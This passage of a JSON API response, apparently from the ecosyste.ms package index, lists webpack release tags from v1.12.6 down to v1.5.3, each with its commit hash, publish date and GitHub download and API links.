yste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{